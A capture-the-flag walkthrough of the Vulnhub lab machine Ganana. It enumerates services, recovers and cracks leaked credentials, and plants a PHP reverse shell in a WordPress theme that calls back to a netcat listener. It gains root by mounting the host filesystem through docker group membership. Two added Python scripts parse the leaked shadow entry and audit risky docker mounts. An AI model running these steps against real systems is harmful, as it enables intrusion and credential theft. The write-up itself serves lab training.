[VLN] Ganana

Today we are going to hack the Vulnhub machine called Ganana. You can download it from the following link: https://www.vulnhub.com/entry/ganana-1,497/
  • Enumeration
    We start with an nmap scan to see which ports are open.

    sml@Cassandra:~$ nmap -A -p- 192.168.1.142
    Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-26 16:42 CEST
    Nmap scan report for debian.home (192.168.1.142)
    Host is up (0.0014s latency).
    Not shown: 65531 filtered ports
    PORT     STATE  SERVICE  VERSION
    22/tcp   closed ssh
    80/tcp   open   http     Apache httpd (PHP 7.3.17)
    |_http-generator: WordPress 5.4.2
    | http-robots.txt: 1 disallowed entry
    |_/wp-admin/
    |_http-server-header: Apache
    |_http-title: Ganana
    443/tcp  open   ssl/http Apache httpd (PHP 7.3.17)
    |_http-generator: WordPress 5.4.2
    | http-robots.txt: 1 disallowed entry
    |_/wp-admin/
    |_http-server-header: Apache
    |_http-title: Ganana
    | ssl-cert: Subject: commonName=www.example.com/organizationName=Bitnami
    | Not valid before: 2020-06-06T10:55:45
    |_Not valid after:  2030-06-04T10:55:45
    6777/tcp open   ftp      vsftpd 3.0.3
    | ftp-anon: Anonymous FTP login allowed (FTP code 230)
    |_Can't get directory listing: TIMEOUT
    | ftp-syst:
    |   STAT:
    | FTP server status:
    |      Connected to ::ffff:192.168.1.148
    |      Logged in as ftp
    |      TYPE: ASCII
    |      No session bandwidth limit
    |      Session timeout in seconds is 300
    |      Control connection is plain text
    |      Data connections will be plain text
    |      At session startup, client count was 3
    |      vsFTPd 3.0.3 - secure, fast, stable
    |_End of status
    Service Info: OS: Unix

    Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 167.04 seconds
    We explore port 80 a bit further.

    sml@Cassandra:~$ gobuster dir -u http://192.168.1.142 -w /usr/share/wordlists/dirb/big.txt
    ===============================================================
    Gobuster v3.0.1
    by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
    ===============================================================
    [+] Url:            http://192.168.1.142
    [+] Threads:        10
    [+] Wordlist:       /usr/share/wordlists/dirb/big.txt
    [+] Status codes:   200,204,301,302,307,401,403
    [+] User Agent:     gobuster/3.0.1
    [+] Timeout:        10s
    ===============================================================
    2020/06/26 16:57:41 Starting gobuster
    ===============================================================
    /.htaccess (Status: 403)
    /.htpasswd (Status: 403)
    /! (Status: 301)
    /0 (Status: 301)
    /0000 (Status: 301)
    /asdfjkl; (Status: 301)
    /atom (Status: 301)
    /dashboard (Status: 302)
    /embed (Status: 301)
    /favicon.ico (Status: 302)
    /feed (Status: 301)
    /fixed! (Status: 301)
    /license (Status: 200)
    /logout (Status: 403)
    /lostpassword (Status: 200)
    /page1 (Status: 301)
    /phpmyadmin (Status: 301)
    /rdf (Status: 301)
    /readme (Status: 200)
    /register (Status: 302)
    /robots.txt (Status: 200)
    /rss (Status: 301)
    /rss2 (Status: 301)
    /secret (Status: 302)
    /tasks (Status: 200)
    /wp-admin (Status: 301)
    /wp-content (Status: 301)
    /wp-config (Status: 200)
    /wp-includes (Status: 301)
    ===============================================================
    2020/06/26 17:13:02 Finished
    ===============================================================
    We see several interesting directories. /secret takes us to a WordPress site. /phpmyadmin is a phpMyAdmin :) Visiting /tasks at http://192.168.1.142/tasks we find the following text:

    Hey Jarret Lee! Do manage the office as the admin is away for a few weeks! Admin has created an other temp account for you and details in a pcapng file.

    After some trying, we finally find the .pcapng file it mentions. It is at http://192.168.1.142/jarret.pcapng. Once downloaded, we open it in Wireshark. Going through the HTTP packets that contain POST /login... we end up finding one with the correct credentials:

    jarretlee/NoBrUtEfOrCe__R3Qu1R3d__
    Once we have the credentials, we log in to the FTP server with them.

    sml@Cassandra:~$ ftp 192.168.1.142 6777
    Connected to 192.168.1.142.
    220 (vsFTPd 3.0.3)
    Name (192.168.1.142:sml): jarretlee
    331 Please specify the password.
    Password:
    230 Login successful.
    Remote system type is UNIX.
    Using binary mode to transfer files.
    ftp> ls -la
    200 PORT command successful. Consider using PASV.
    150 Here comes the directory listing.
    drwxr-xr-x    3 1000     1000         4096 Jun 25 06:25 .
    drwxr-xr-x    3 600      0            4096 Jun 17 07:00 ..
    -rw-------    1 1000     1000          177 Jun 17 07:47 .backups
    -rw-------    1 1000     1000          515 Jun 25 06:25 .bash_history
    -rw-r--r--    1 1000     1000          220 Jun 17 07:00 .bash_logout
    -rw-r--r--    1 1000     1000         3526 Jun 17 07:00 .bashrc
    drwx------    3 1000     1000         4096 Jun 25 06:25 .gnupg
    -rw-r--r--    1 1000     1000          807 Jun 17 07:00 .profile
    226 Directory send OK.
    ftp> get .backups
    local: .backups remote: .backups
    200 PORT command successful. Consider using PASV.
    150 Opening BINARY mode data connection for .backups (177 bytes).
    226 Transfer complete.
    177 bytes received in 0.00 secs (1.5071 MB/s)
    We see there is a file called .backups, so we download it to find out what it is.

    sml@Cassandra:~/yeah$ cat .backups
    amVldmFuOiQ2JExYTmFrYUJSSi90TDVGMmEkYkNnaXlsay9MWTJNZUZwNXo5WVp5aWV6c05zZ2ouNS9j
    RG9oUmdGUkJOZHJ3aS8ySVBrVU8wcnFWSU0zTzh2eXNjNDhnM1pwby9zSHVvLnF3QmY0VTE6MTg0MzA6
    MDo5OTk5OTo3Ojo6

    It is Base64, so we decode it.

    sml@Cassandra:~/yeah$ echo "amVldmFuOiQ2JExYTmFrYUJSSi90TDVGMmEkYkNnaXlsay9MWTJNZUZwNXo5WVp5aWV6c05zZ2ouNS9jRG9oUmdGUkJOZHJ3aS8ySVBrVU8wcnFWSU0zTzh2eXNjNDhnM1pwby9zSHVvLnF3QmY0VTE6MTg0MzA6MDo5OTk5OTo3Ojo6" | base64 -d
    jeevan:$6$LXNakaBRJ/tL5F2a$bCgiylk/LY2MeFp5z9YZyiezsNsgj.5/cDohRgFRBNdrwi/2IPkUO0rqVIM3O8vysc48g3Zpo/sHuo.qwBf4U1:18430:0:99999:7:::

    It looks like jeevan's hashed password, in the format normally found in /etc/shadow. We copy the user and the "password" to a file and use john to crack it (the line goes in single quotes so the shell does not expand the $ signs in the hash).

    sml@Cassandra:~$ echo 'jeevan:$6$LXNakaBRJ/tL5F2a$bCgiylk/LY2MeFp5z9YZyiezsNsgj.5/cDohRgFRBNdrwi/2IPkUO0rqVIM3O8vysc48g3Zpo/sHuo.qwBf4U1' > paz.txt
    sml@Cassandra:~$ /usr/sbin/john paz.txt --wordlist=rockyou.txt
    Using default input encoding: UTF-8
    Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
    Cost 1 (iteration count) is 5000 for all loaded hashes
    Will run 4 OpenMP threads
    Press 'q' or Ctrl-C to abort, almost any other key for status
    hannahmontana    (jeevan)
    1g 0:00:00:00 DONE (2020-06-26 23:40) 1.492g/s 3820p/s 3820c/s 3820C/s slimshady..hassan
    Use the "--show" option to display all of the cracked passwords reliably
    Session completed
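As an added example (not part of the original write-up), the Python script below does the same decode as the `base64 -d` step and then splits the result into the shadow(5) fields, so you can see at a glance what actually leaked: which account, which crypt(3) scheme and salt, and the password-ageing values. The blob is the one from the .backups file above; the 18430 in the third field is days since the epoch and resolves to 2020-06-17, the same date the FTP listing shows for the file. The parser assumes the `$id$salt$digest` layout of md5crypt, sha256crypt and sha512crypt without a `rounds=` parameter.

```python
"""Decode the .backups blob and parse it as an /etc/shadow entry (added example)."""
import base64
import datetime
from dataclasses import dataclass
from typing import Optional

# crypt(3) scheme identifiers that use the "$id$salt$digest" layout.
CRYPT_IDS = {"1": "md5crypt", "5": "sha256crypt", "6": "sha512crypt"}

# Blob copied from the .backups file in the write-up, line breaks removed.
BACKUPS_BLOB = (
    "amVldmFuOiQ2JExYTmFrYUJSSi90TDVGMmEkYkNnaXlsay9MWTJNZUZwNXo5WVp5aWV6c05zZ2ouNS9j"
    "RG9oUmdGUkJOZHJ3aS8ySVBrVU8wcnFWSU0zTzh2eXNjNDhnM1pwby9zSHVvLnF3QmY0VTE6MTg0MzA6"
    "MDo5OTk5OTo3Ojo6"
)


@dataclass
class ShadowEntry:
    user: str
    algorithm: str                         # crypt(3) scheme name, from CRYPT_IDS
    salt: str
    digest: str
    last_change: Optional[datetime.date]   # field 3: days since 1970-01-01
    min_days: Optional[int]
    max_days: Optional[int]
    warn_days: Optional[int]


def _int_or_none(field: str) -> Optional[int]:
    return int(field) if field else None


def parse_shadow_line(line: str) -> ShadowEntry:
    """Split one shadow(5) line into its nine fields and unpack the crypt string."""
    fields = line.strip().split(":")
    if len(fields) != 9:
        raise ValueError(f"expected 9 colon-separated fields, got {len(fields)}")
    user, pw, lastchg, mindays, maxdays, warn, _inactive, _expire, _flag = fields
    # Locked ("!", "*") or empty password fields carry no crypt string.
    if not pw.startswith("$"):
        raise ValueError(f"{user}: no crypt(3) hash present ({pw!r})")
    # ['', id, salt, digest] for $1$/$5$/$6$; "rounds=N" variants are rejected here.
    parts = pw.split("$")
    if len(parts) != 4 or parts[1] not in CRYPT_IDS:
        raise ValueError(f"{user}: unsupported crypt string {pw[:4]!r}...")
    last_change = None
    if lastchg:
        last_change = datetime.date(1970, 1, 1) + datetime.timedelta(days=int(lastchg))
    return ShadowEntry(
        user=user, algorithm=CRYPT_IDS[parts[1]], salt=parts[2], digest=parts[3],
        last_change=last_change, min_days=_int_or_none(mindays),
        max_days=_int_or_none(maxdays), warn_days=_int_or_none(warn),
    )


def decode_backup(blob: str) -> ShadowEntry:
    """Base64-decode the blob (whitespace and line wraps tolerated) and parse it."""
    raw = base64.b64decode("".join(blob.split()), validate=True)
    return parse_shadow_line(raw.decode("ascii"))


if __name__ == "__main__":
    e = decode_backup(BACKUPS_BLOB)
    print(f"user={e.user} scheme={e.algorithm} salt={e.salt}")
    print(f"last change={e.last_change} min/max/warn={e.min_days}/{e.max_days}/{e.warn_days}")
```

The 86-character digest and the `$6$` prefix are what john recognises as sha512crypt in the run above; the scheme itself is not the weakness here, the weakness is a copy of a shadow line sitting in a home directory that an FTP account can read.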
    We see that jeevan's password is hannahmontana. We continue in the FTP session. This time we go to the directory /opt/bitnami/apps/wordpress/htdocs and download the file wp-config.php.

    ftp> pwd
    257 "/opt/bitnami/apps/wordpress/htdocs" is the current directory
    ftp> ls
    200 PORT command successful. Consider using PASV.
    150 Here comes the directory listing.
    -rw-rw-r--    1 1000     1             405 Feb 06 06:33 index.php
    -rw-r--r--    1 1000     1000       189728 Jun 07 08:45 jarret.pcapng
    -rw-rw-r--    1 1000     1           19915 Feb 12 11:54 license.txt
    -rw-rw-r--    1 1000     1            7278 Jun 16 16:11 readme.html
    -rw-r--r--    1 0        0             156 Jun 17 08:15 tasks.txt
    -rw-rw-r--    1 1000     1            6912 Feb 06 06:33 wp-activate.php
    drwxrwxr-x    9 1000     1            4096 Jun 03 11:23 wp-admin
    -rw-rw-r--    1 1000     1             351 Feb 06 06:33 wp-blog-header.php
    -rw-rw-r--    1 1000     1            2332 Jun 16 16:11 wp-comments-post.php
    -rw-r-----    1 1000     1            4268 Jun 06 10:55 wp-config.php
    drwxrwxr-x    9 1000     1            4096 Jun 06 15:08 wp-content
    -rw-rw-r--    1 1000     1            3940 Feb 06 06:33 wp-cron.php
    drwxrwxr-x   21 1000     1           12288 Jun 03 11:23 wp-includes
    -rw-rw-r--    1 1000     1            2496 Feb 06 06:33 wp-links-opml.php
    -rw-rw-r--    1 1000     1            3300 Feb 06 06:33 wp-load.php
    -rw-rw-r--    1 1000     1           47874 Feb 10 03:50 wp-login.php
    -rw-rw-r--    1 1000     1            8509 Apr 14 11:34 wp-mail.php
    -rw-rw-r--    1 1000     1           19396 Apr 10 03:59 wp-settings.php
    -rw-rw-r--    1 1000     1           31111 Feb 06 06:33 wp-signup.php
    -rw-rw-r--    1 1000     1            4755 Feb 06 06:33 wp-trackback.php
    -rw-rw-r--    1 1000     1            3133 Feb 06 06:33 xmlrpc.php
    226 Directory send OK.
    ftp> get wp-config.php
    local: wp-config.php remote: wp-config.php
    200 PORT command successful. Consider using PASV.
    150 Opening BINARY mode data connection for wp-config.php (4268 bytes).
    226 Transfer complete.
    4268 bytes received in 0.00 secs (5.0815 MB/s)
    Let's see whether it has what we are looking for :)

    sml@Cassandra:~/yeah$ cat wp-config.php
    ---SNIP---
    /** MySQL database username */
    define( 'DB_USER', 'bn_wordpress' );

    /** MySQL database password */
    define( 'DB_PASSWORD', 'aa75e9f9b1' );

    /** MySQL hostname */
    define( 'DB_HOST', 'localhost:3306' );

    /** Database Charset to use in creating database tables. */
    define( 'DB_CHARSET', 'utf8' );
    ---SNIP---
    Good, we have credentials! We use them to log in to phpMyAdmin at http://192.168.1.142/phpmyadmin/. In the bitnami_wordpress database we go to the wp_users table and replace the password of the user charleywalker with jarretlee's, since we know that one. Once it is changed, we log in to WordPress as charleywalker with the password we just set... that is, the same password jarretlee uses. We prepare a reverse shell.

    sml@Cassandra:~$ cp /usr/share/webshells/php/php-reverse-shell.php .
    sml@Cassandra:~$ mv php-reverse-shell.php rshell.php
    sml@Cassandra:~$ nano rshell.php   # edit it with our IP/port

    In WordPress, logged in as charleywalker, we go to Appearance -> Theme Editor -> 404 Template (404.php). We edit it, paste the reverse shell and save. We start nc listening:

    sml@Cassandra:~$ nc -nlvp 1234
    listening on [any] 1234 ...

    And we visit http://192.168.1.142/404.php
  • Low Shell
    sml@Cassandra:~$ nc -nlvp 1234
    listening on [any] 1234 ...
    connect to [192.168.1.148] from (UNKNOWN) [192.168.1.142] 57130
    Linux debian 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2 (2020-04-29) x86_64 GNU/Linux
     19:57:55 up  2:04,  0 users,  load average: 0.44, 0.16, 0.10
    USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
    uid=1(daemon) gid=1(daemon) groups=1(daemon)
    /bin/sh: 0: can't access tty; job control turned off
    $ id
    uid=1(daemon) gid=1(daemon) groups=1(daemon)

    Since we found jeevan's password in the previous steps, we use su to switch to that user.

    $ python3 -c 'import pty; pty.spawn("/bin/bash")'
    daemon@debian:/home$
    daemon@debian:/home/jarretlee$ su jeevan
    Password: hannahmontana
    jeevan@debian:/home/jarretlee$ id
    uid=1003(jeevan) gid=1005(jeevan) groups=1005(jeevan),115(docker)
    We see that jeevan is in the docker group, so let's see which images are available.

    jeevan@debian:/tmp$ docker images
    REPOSITORY          TAG                 IMAGE ID            CREATED             SIZE
    bash                latest              0980cb958276        3 weeks ago         13.1MB
    alpine              latest              a24bb4013296        3 weeks ago         5.57MB
    hello-world         latest              bf756fb1ae65        5 months ago        13.3kB

    There is a bash image that can be useful :) We mount the host's / at /mnt/mygod inside the container we are about to run; since we are root inside the container, we can read the entire root filesystem of the host that we mounted at /mnt/mygod...
  • root.txt
    jeevan@debian:/tmp$ docker run -v /:/mnt/mygod -ti 0980cb958276
    bash-5.0# cd /mnt/mygod/root
    bash-5.0# ls
    bitnami  jeevan  bitnami_credentials  root.txt
    bash-5.0# cat root.txt
    [ASCII-art train banner]
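From the defender's side, the docker-group pivot above is worth checking for. The script below is an added example (not from the original write-up or from the Docker project): it parses the JSON that `docker inspect` emits (the Mounts and HostConfig.Privileged fields are Docker's own) and flags containers that bind-mount the host root or other sensitive host paths, and it lists the members of the docker group from /etc/group, since each of them can do exactly what jeevan does here. The inspect document and the /etc/group text are constructed samples that mirror the `-v /:/mnt/mygod` run and the gid 115 docker group seen in the `id` output; on a real host feed it the output of `docker inspect $(docker ps -aq)`.

```python
"""Audit docker containers for host-filesystem exposure (added example)."""
import json
from typing import Dict, List

# Host paths that, once bind-mounted into a container, hand over the host.
SENSITIVE_HOST_PATHS = ("/", "/etc", "/root", "/boot", "/proc", "/sys",
                        "/var/run/docker.sock")

# Constructed sample of `docker inspect` output: the first entry mirrors the
# `docker run -v /:/mnt/mygod -ti 0980cb958276` step, the second is benign.
SAMPLE_INSPECT = json.dumps([
    {
        "Id": "0000000000000000000000000000000000000000000000000000000000000001",
        "Name": "/eager_mygod",
        "Config": {"Image": "0980cb958276", "User": ""},
        "HostConfig": {"Binds": ["/:/mnt/mygod"], "Privileged": False},
        "Mounts": [{"Type": "bind", "Source": "/", "Destination": "/mnt/mygod",
                    "Mode": "", "RW": True}],
    },
    {
        "Id": "0000000000000000000000000000000000000000000000000000000000000002",
        "Name": "/quiet_app",
        "Config": {"Image": "alpine:latest", "User": "1000"},
        "HostConfig": {"Binds": ["/srv/app/data:/data:ro"], "Privileged": False},
        "Mounts": [{"Type": "bind", "Source": "/srv/app/data", "Destination": "/data",
                    "Mode": "ro", "RW": False}],
    },
])

# Constructed /etc/group excerpt; gid 115 matches the `id` output in the write-up.
SAMPLE_GROUP = """root:x:0:
sudo:x:27:bitnami
docker:x:115:jeevan
jeevan:x:1005:
"""


def covers_sensitive_path(source: str) -> bool:
    """True if a bind source is a sensitive host path, a parent of one, or inside one."""
    src = source.rstrip("/") or "/"
    if src == "/":
        return True
    return any(src == s or s.startswith(src + "/") or src.startswith(s + "/")
               for s in SENSITIVE_HOST_PATHS if s != "/")


def audit_inspect(inspect_json: str) -> List[Dict]:
    """One finding per container that bind-mounts a sensitive host path or runs privileged."""
    findings = []
    for c in json.loads(inspect_json):
        reasons = []
        for m in c.get("Mounts", []):
            if m.get("Type") == "bind" and covers_sensitive_path(m["Source"]):
                mode = "rw" if m.get("RW", True) else "ro"
                reasons.append(f"bind {m['Source']} -> {m['Destination']} ({mode})")
        if c.get("HostConfig", {}).get("Privileged"):
            reasons.append("privileged")
        if reasons:
            findings.append({"id": c["Id"][:12], "name": c["Name"].lstrip("/"),
                             "image": c["Config"]["Image"], "reasons": reasons})
    return findings


def docker_group_members(etc_group: str) -> List[str]:
    """Members of the docker group in /etc/group text; each one is root-equivalent on the host."""
    for line in etc_group.splitlines():
        if not line:
            continue
        name, _pw, _gid, members = line.split(":", 3)
        if name == "docker":
            return [m for m in members.split(",") if m]
    return []


if __name__ == "__main__":
    for f in audit_inspect(SAMPLE_INSPECT):
        print(f"{f['id']} {f['name']} ({f['image']}): " + "; ".join(f["reasons"]))
    print("docker group members:", ", ".join(docker_group_members(SAMPLE_GROUP)))
```

The mount check is deliberately broad: a bind of /var/run is flagged because it contains docker.sock, and a bind of /etc/shadow is flagged because it sits under /etc. Membership in the docker group is the finding that matters most, since with it no container needs to exist yet for the host to be exposed.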
  • End
    And with that we would be root on the machine :)